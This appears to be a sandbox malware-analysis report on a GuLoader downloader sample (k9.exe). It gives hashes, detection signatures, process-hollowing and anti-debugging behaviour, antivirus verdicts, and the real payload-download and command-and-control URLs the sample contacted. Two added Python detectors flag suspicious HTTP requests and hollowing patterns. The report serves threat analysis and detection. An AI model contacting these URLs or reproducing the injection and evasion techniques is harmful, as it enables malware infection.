2020-06-05 14:13:37,515 [root] INFO: Uploading files at path "C:\AZpGbR\debugger" 
2020-06-05 14:13:37,562 [root] INFO: Analysis completed.

Machine

Name: win7x64_2
Label: win7x64_6
Manager: KVM
Started On: 2020-06-05 14:10:07
Shutdown On: 2020-06-05 14:16:26

File Details

File Name k9.exe
File Size 110592 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
PE timestamp 2015-12-29 22:49:03
MD5 e90f65f7349ec9abc20d69db96c6e241
SHA1 23f23cc9d0c74c15c8cb49ab5bb9b7fc5522c9cc
SHA256 2a093b2213d7d589020d69e76fdfd33b441ed125664cb3247d25e9103744011c
SHA512 6b0d903d2d8c46ffb618fb870f49090e6c2d2472ebdc8483c31207bda61d224eb658c3299a9ea7f8f80534e0471e623c270caac68a9fcfd5ec933b88c228d144
CRC32 D8FC3B2A
Ssdeep 3072:4rdhcMmoFKEeSDpZjl57ivuPwfSVgPut2keB7JsdoYwKf0Nx:4IXoAT0iv0eB7JsnwKf0j

Signatures

Behavioural detection: Executable code extraction - unpacking
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 2940 triggered the Yara rule 'shellcode_get_eip'
Hit: PID 2940 triggered the Yara rule 'shellcode_patterns'
Hit: PID 2940 triggered the Yara rule 'HeavensGate'
Hit: PID 2940 triggered the Yara rule 'GuLoader'
Creates RWX memory
NtSetInformationThread: attempt to hide thread from debugger
Possible date expiration check, exits too soon after checking local time
process: k9.exe, PID 2940
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDOrCLSIDToTypeLibrary
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: asycfilt.dll/FilterCreateInstance
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: VERSION.DLL/VerQueryValueA
DynamicLoader: VERSION.DLL/GetFileVersionInfoSizeA
DynamicLoader: VERSION.DLL/GetFileVersionInfoA
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: kernel32.dll/GetCalendarInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
URLs from behavior (sandbox signature "HTTPS urls from behavior"; note the URL it recorded is plain HTTP):
URL: http://amuhapps.com/a1/bin_WHDqrJTtDa208.bin
CAPE extracted potentially suspicious content
k9.exe: Injected PE Image: 32-bit DLL
k9.exe: Unpacked Shellcode
k9.exe: GuLoader
k9.exe: Injected PE Image: 32-bit executable
k9.exe: Unpacked Shellcode
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.parkwayautogroup.com/mts/?OVolp=dJC7qAZce2ug3U8GWKjWyJsQhcgydeghdBU/9ylRi86kip+Jtmb5eRwP3b+D8a46&lhv4=H0DTRf2P8tY0iN
suspicious_request: http://www.vinoblay.com/mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNgeiCRdxH+RKQ1MBq3Brf9r9O64pHDbGWQye08Q1cyBpd2&lhv4=H0DTRf2P8tY0iN
suspicious_request: http://www.vinoblay.com/mts/
suspicious_request: http://www.esprit-de-connaisseur.com/mts/?OVolp=Eowx6rOx5ZT8Kc016FqZyZ3liYvuYMMnhwUnLKcqlNFGtZIsjnDoIJzI/txoB1MC&lhv4=H0DTRf2P8tY0iN
suspicious_request: http://www.esprit-de-connaisseur.com/mts/
Performs some HTTP requests
url: http://amuhapps.com/a1/bin_WHDqrJTtDa208.bin
url: http://www.parkwayautogroup.com/mts/?OVolp=dJC7qAZce2ug3U8GWKjWyJsQhcgydeghdBU/9ylRi86kip+Jtmb5eRwP3b+D8a46&lhv4=H0DTRf2P8tY0iN
url: http://www.vinoblay.com/mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNgeiCRdxH+RKQ1MBq3Brf9r9O64pHDbGWQye08Q1cyBpd2&lhv4=H0DTRf2P8tY0iN
url: http://www.vinoblay.com/mts/
url: http://www.esprit-de-connaisseur.com/mts/?OVolp=Eowx6rOx5ZT8Kc016FqZyZ3liYvuYMMnhwUnLKcqlNFGtZIsjnDoIJzI/txoB1MC&lhv4=H0DTRf2P8tY0iN
url: http://www.esprit-de-connaisseur.com/mts/
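
The two HTTP signatures above (get_no_useragent and suspicious_request) come down to simple checks over a request log. The block below is an added example and not CAPE's signature code: the request log is constructed from the report's URLs with header sets invented for the example, and the 40-character base64 threshold plus the rule that a bare path is only flagged after the same host and path was seen with an opaque query are assumptions chosen to reproduce the pairing shown in the list above.

```python
"""Checks behind the two HTTP signatures listed above: a GET carrying no
User-Agent header, and a request whose query string is one opaque base64-like
blob.  Added example, not the sandbox's signature code; the request log is
constructed here from the report's URLs with invented header sets."""
import base64
import re
from urllib.parse import urlsplit

# Constructed sample log: (method, url, headers).  The last entry is a benign
# control request that should trip nothing.
SAMPLE_REQUESTS = [
    ("GET", "http://amuhapps.com/a1/bin_WHDqrJTtDa208.bin",
     {"Host": "amuhapps.com"}),
    ("GET", "http://www.vinoblay.com/mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNgeiCRdxH+RKQ1MBq3Brf9r9O64pHDbGWQye08Q1cyBpd2&lhv4=H0DTRf2P8tY0iN",
     {"Host": "www.vinoblay.com", "Connection": "close"}),
    ("GET", "http://www.vinoblay.com/mts/",
     {"Host": "www.vinoblay.com"}),
    ("GET", "http://example.test/index.html",
     {"Host": "example.test", "User-Agent": "Mozilla/5.0"}),
]

# 40+ base64 characters with optional padding (assumed threshold); short
# tokens such as the 'lhv4=' value are ignored on purpose.
OPAQUE_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def query_values(query):
    """Split a raw query string without decoding it.  parse_qsl() would turn
    the '+' inside a base64 blob into a space and defeat the check below."""
    return [pair.split("=", 1)[1] if "=" in pair else ""
            for pair in query.split("&") if pair]


def is_opaque_value(value):
    """True when a query value is a well-formed base64 blob of 40+ characters."""
    if not OPAQUE_RE.match(value):
        return False
    padded = value + "=" * (-len(value) % 4)
    try:
        base64.b64decode(padded, validate=True)
    except (ValueError, TypeError):
        return False
    return True


def analyse_log(requests):
    """Return {url: [signature names]} for a request log.

    A bare path is flagged only after the same host and path has been seen
    with an opaque query, mirroring the pairing in the report where the
    '?OVolp=...' request is followed by a bare '/mts/'."""
    seen_opaque = set()
    results = {}
    for method, url, headers in requests:
        hits = []
        if method == "GET" and not any(k.lower() == "user-agent" for k in headers):
            hits.append("get_no_useragent")
        parts = urlsplit(url)
        key = (parts.netloc.lower(), parts.path)
        if any(is_opaque_value(v) for v in query_values(parts.query)):
            hits.append("opaque_query")
            seen_opaque.add(key)
        elif key in seen_opaque:
            hits.append("bare_path_after_opaque_query")
        results[url] = hits
    return results


if __name__ == "__main__":
    for url, hits in analyse_log(SAMPLE_REQUESTS).items():
        print(url, hits or "clean")
```

The query string is split by hand rather than with urllib's parse_qsl because the latter decodes '+' to a space, which silently corrupts the base64 value in the second sample request and would make the check miss it.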
Unconventional language used in binary resources: Catalan
Authenticode signature is invalid
authenticode error: No signature found. SignTool Error File not valid C:\Users\Louise\AppData\Local\Temp\k9.exe
Behavioural detection: Injection (Process Hollowing)
Injection: k9.exe(2940) -> k9.exe(2476)
Executed a process and injected code into it, probably while unpacking
Injection: k9.exe(2940) -> k9.exe(2476)
Behavioural detection: Injection (inter-process)
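
The hollowing verdict above is a correlation over the API trace: the same caller creates a child suspended, unmaps or rewrites its thread context, writes into it, and resumes it. The block below is an added example of that correlation, not CAPE's signature code; the trace is constructed (API names and argument fields are modelled on a sandbox call log, only the PIDs are taken from the verdict above) and the API sets that count as write, execute and hollowing steps are assumptions.

```python
"""Turn a per-call API trace into the 'Injection: src(pid) -> dst(pid)'
verdicts above by correlating who created which process suspended, who wrote
into whose memory, and who resumed or started a thread there.  Added example
with a constructed trace; it is not CAPE's signature code and not the real
call log of k9.exe, only the PIDs are taken from the report."""
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004          # dwCreationFlags bit in CreateProcess*

# Constructed trace entries: (caller_pid, api_name, arguments).
SAMPLE_TRACE = [
    (2940, "CreateProcessInternalW",
     {"path": r"C:\Users\Louise\AppData\Local\Temp\k9.exe",
      "flags": CREATE_SUSPENDED, "child_pid": 2476}),
    (2940, "NtUnmapViewOfSection", {"target_pid": 2476}),
    (2940, "NtAllocateVirtualMemory", {"target_pid": 2476, "protect": 0x40}),
    (2940, "NtWriteVirtualMemory", {"target_pid": 2476, "size": 0x17000}),
    (2940, "NtSetContextThread", {"target_pid": 2476}),
    (2940, "NtResumeThread", {"target_pid": 2476}),
    # Control: a parent that starts a child normally and never touches it.
    (1200, "CreateProcessInternalW",
     {"path": r"C:\Windows\System32\notepad.exe", "flags": 0, "child_pid": 1300}),
]
SAMPLE_IMAGES = {2940: "k9.exe", 2476: "k9.exe", 1200: "explorer.exe", 1300: "notepad.exe"}

# Assumed groupings of the APIs that matter for each step.
WRITE_APIS = {"NtWriteVirtualMemory", "WriteProcessMemory"}
EXEC_APIS = {"NtResumeThread", "ResumeThread", "NtCreateThreadEx",
             "CreateRemoteThread", "QueueUserAPC", "NtQueueApcThread"}
HOLLOW_APIS = {"NtUnmapViewOfSection", "NtSetContextThread", "SetThreadContext"}


def find_injections(trace, images):
    """Return [(verdict, 'src.exe(pid) -> dst.exe(pid)'), ...].

    Hollowing needs all three: the target was created suspended by the same
    caller, its image was unmapped or its thread context rewritten, and memory
    was written before execution was handed over.  A write plus a thread start
    into a process the caller did not create suspended is plain inter-process
    injection."""
    suspended_by = {}                  # child pid -> creator pid
    apis = defaultdict(set)            # (src pid, dst pid) -> api names seen
    for pid, api, args in trace:
        if api.startswith("CreateProcess") and args.get("flags", 0) & CREATE_SUSPENDED:
            suspended_by[args["child_pid"]] = pid
        target = args.get("target_pid")
        if target is not None and target != pid:
            apis[(pid, target)].add(api)
    verdicts = []
    for (src, dst), seen in apis.items():
        if not (seen & WRITE_APIS and seen & EXEC_APIS):
            continue                   # no write, or nothing ever ran: not an injection
        label = f"{images[src]}({src}) -> {images[dst]}({dst})"
        if suspended_by.get(dst) == src and seen & HOLLOW_APIS:
            verdicts.append(("Injection (Process Hollowing)", label))
        else:
            verdicts.append(("Injection (inter-process)", label))
    return verdicts


if __name__ == "__main__":
    for verdict, label in find_injections(SAMPLE_TRACE, SAMPLE_IMAGES):
        print(f"{verdict}: {label}")
```

A write without any execution hand-over is deliberately not reported: debuggers and some installers write into child processes, and it is the resume, remote thread or APC that turns the write into an injection.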
File has been identified by 15 Antiviruses on VirusTotal as malicious
Qihoo-360: HEUR/QVM03.0.B441.Malware.Gen
Cylance: Unsafe
Sangfor: Malware
APEX: Malicious
Kaspersky: UDS:DangerousObject.Multi.Generic
Paloalto: generic.ml
Trapmine: malicious.high.ml.score
SentinelOne: DFI - Suspicious PE
Endgame: malicious (high confidence)
ZoneAlarm: UDS:DangerousObject.Multi.Generic
McAfee: Fareit-FST!E90F65F7349E
ESET-NOD32: a variant of Win32/GenKryptik.ELXE
Rising: Downloader.Guloader!1.C738 (CLASSIC)
eGambit: Unsafe.AI_Score_80%
BitDefenderTheta: Gen:[email protected] (signature text garbled at extraction)
Attempts to modify proxy settings (fired on the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\... values listed under Summary; Windows' WinHTTP automatic proxy detection writes the WpadDecision, WpadDecisionTime and WpadDetectedUrl values itself when a process first resolves a proxy, so on its own this signature is weak evidence of deliberate proxy tampering)
Created network traffic indicative of malicious activity
signature: ET JA3 Hash - Possible Malware - Various Eitest

Hosts

Direct  IP              Country Name
Y       8.8.8.8         United States
N       67.217.34.88    United States
N       63.250.37.110   United States
Y       51.105.208.173  United Kingdom
N       23.20.239.12    United States
N       188.165.53.185  France

DNS

Name                            Response           Post-Analysis Lookup
amuhapps.com                    A 67.217.34.88     67.217.34.88
www.parkwayautogroup.com        A 23.20.239.12     23.20.239.12
www.aroundthehearth.net         NXDOMAIN           -
www.vinoblay.com                A 63.250.37.110    63.250.37.110
www.esprit-de-connaisseur.com   A 188.165.53.185   188.165.53.185
www.cp75788.com                 -                  -
www.eskenaskhareji.com          -                  -
www.hissexualhealth.com         -                  -
www.electriciandearbornmi.com   -                  -

Summary

Files

C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Louise\AppData\Local\Temp\k9.exe.cfg
C:\Windows\sysnative\C_932.NLS
C:\Windows\sysnative\C_949.NLS
C:\Windows\sysnative\C_950.NLS
C:\Windows\sysnative\C_936.NLS
C:\Users\Louise\AppData\Local\Temp\~DFE3607EB907E82968.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\SysWOW64\msvbvm60.dll
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Louise\AppData\Local\Temp\~DFE3607EB907E82968.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\SysWOW64\msvbvm60.dll
C:\Windows\SysWOW64\ntdll.dll
C:\Users\Louise\AppData\Local\Temp\~DFE3607EB907E82968.TMP

Registry keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Codepage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT\UserEra
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Policies\Microsoft\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\antistrike\VIKTUALIEFORRETNINGS
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadNetworkName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
